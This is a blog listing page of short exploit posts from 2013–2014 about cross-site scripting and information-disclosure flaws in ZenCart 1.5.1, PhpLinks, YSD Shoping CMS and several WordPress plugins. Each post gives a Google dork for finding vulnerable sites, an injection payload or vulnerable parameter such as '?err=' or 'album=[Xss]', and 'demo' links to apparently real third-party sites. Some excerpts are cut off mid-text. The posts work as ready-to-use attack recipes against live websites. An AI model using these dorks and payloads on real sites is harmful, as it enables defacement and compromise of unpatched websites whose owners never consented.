Cross Site Scripting

ZenCart 1.5.1 Multiple Vulnerabilities

By |February 24th, 2014|

Exploit Title: ZenCart v1.5.1 – Multiple Vulnerabilities
Exploit Author: UmPire
Date: 21 Feb 2014
Vendor Homepage: https://www.zen-cart.com/
Version: 1.5.1
Tested on: Windows
Google Dork: inurl:”zc_install/index.php”

Cross Site Scripting Vulnerability
In the fourth step of installation, there are vulnerable fields.
vulnerable input: ” onmouseover=alert(/Hacked/) bad=”

Full Path Disclosure
In the third step of installation there is this vulnerability
Path_Translated = Drive:\\[WebPage-Directiory]\\[USER]\\zen\\zc_install\\index.php

Sensitive phpinfo reading
This is in this path:
http://[Host]/zen/zc_install/includes/phpinfo.php

Demo […]


WordPress WP-Password Plugin XSS Vulnerability

By |February 24th, 2014|

title: WordPress WP-Password Plugin XSS Vulnerability
Author: Arash Cyber
date: 2/15/2014
Category: WebApp
Google Dork: inurl:”/wp-content/plugins/wp-password/login.php”
Tested On: Windows – Linux
Site: Attacker-Team.org

# Type: XSS Vulnerability
# Exploit: http://Site.com/{Path}/wp-content/plugins/wp-password/login.php?err={Your Text}
# Explanation: Copy The Dork In Google – Open A Site – Delete All Texts After login.php
Copy This Code At The End Of The Url: ?err={Your Text} – And End 😀

Demo:
-http://fukushXimaboys.com/wp-content/plugins/wp-password/login.php?err=Your Text
-http://wakayXama-jc.net/2012/wp-content/plugins/wp-password/login.php?err=Your […]


WordPress fgallery plus Plugin Xss vulnerabilities

By |October 10th, 2013|

Exploit Title : WordPress fgallery plus Plugin Xss vulnerabilities
Author : Iranian Exploit DataBase
Discovered By : IeDb
Email : [email protected]
Home : http://iedb.ir – http://iedb.ir/acc
Software Link : http://wordpress.org/
Security Risk : High
Tested on : Linux
Dork : inurl:/plugins/fgallery_plus/
Exploit :
http://sXXom/wp-content/plugins/fgallery_plus/fim_rss.php?album=[Xss]
Dem0 :

http://alXXdk/wp-content/plugins/fgallery_plus/fim_rss.php?album=3[xss]
http://www.quiolikeoooh.com/quio/wp-content/plugins/fgallery/fim_rss.php?album=3[xss]
Tnx To : TaK.FaNaR – l4tr0d3ctism – r3d_s0urc3 – Bl4ck M4n – Medrik – Dj.TiniVini –
dr.koderz – z3r0 – Mr Zer0
B3hz4d […]


YSD Shoping CMS XSS Vulnerability

By |October 6th, 2013|

Exploit Title: YSD Shoping CMS XSS Vulnerability
XSS Vulnerability In YSD Shoping CMS
Date: 2013 13 September
Author: Hossein Hezami ( Dr.3v1l )
Author Email: [email protected]
Software Link: www.ysd.hk
Version: All Version
Category: webapps
Google dork : inurl:”/product_list.php?bid=” , intext:”Designed by YSD”
Tested on: Windows and Linux

Exploit :
http:///search_result.php?search_key=[XSS]
http:///product_list.php?bid=[XSS]
Demo :
www.dmXaudio.com/search_result.php?search_key=xss
www.Xom/search_result.php?search_key=xss
wwwXm/product_list.php?bid=xss
www.shoXbaby.com.hk/product_list.php?bid=xss


PhpLinks Cross Site Scripting Vulnerability

By |October 6th, 2013|

Exploit Title: PhpLinks Cross Site Scripting Vulnerability
XSS Vulnerability In PhpLinks
Date: 2013 15 September
Author: Arsan
Author email: [email protected]
Author Twitter: @ArsanBlackhat
Vendor Homepage: www.newphplinks.com
Version : All Version
Tested on: Linux & Windows
Category: webapps
Google Keywords:  inurl:”/index.php?PID=” intext:”Powered By phpLinks”

Exploit :
http://127.0.0.1:8081/index.php?PID=[XSS]
http://127.0.0.1:8081/[XSS In SearchBox]

Demo :


WordPress Comment Attachment 1.0 Cross Site Scripting Vulnerability

By |October 5th, 2013|

Exploit Title: WordPress Comment Attachment 1.0 Cross Site Scripting
Date: 2013 20 September
Author: Arsan
author email: [email protected]
author twitter: @ArsanBlackhat
Software Link: http://wordpress.org/plugins/comment-attachment/
Version : 1.0
Tested on: Linux & Windows
Category: webapps
Google Dork : inurl:”/comment-attachment/comment-attachment.php”
Exploit :
[-] Description :
1) Download “Comment Attachment” And Install
2) Go To Comment Attachment Settings:
Settings > Discussion > Comment Attachment
3) Insert In “Attachment field title” This […]
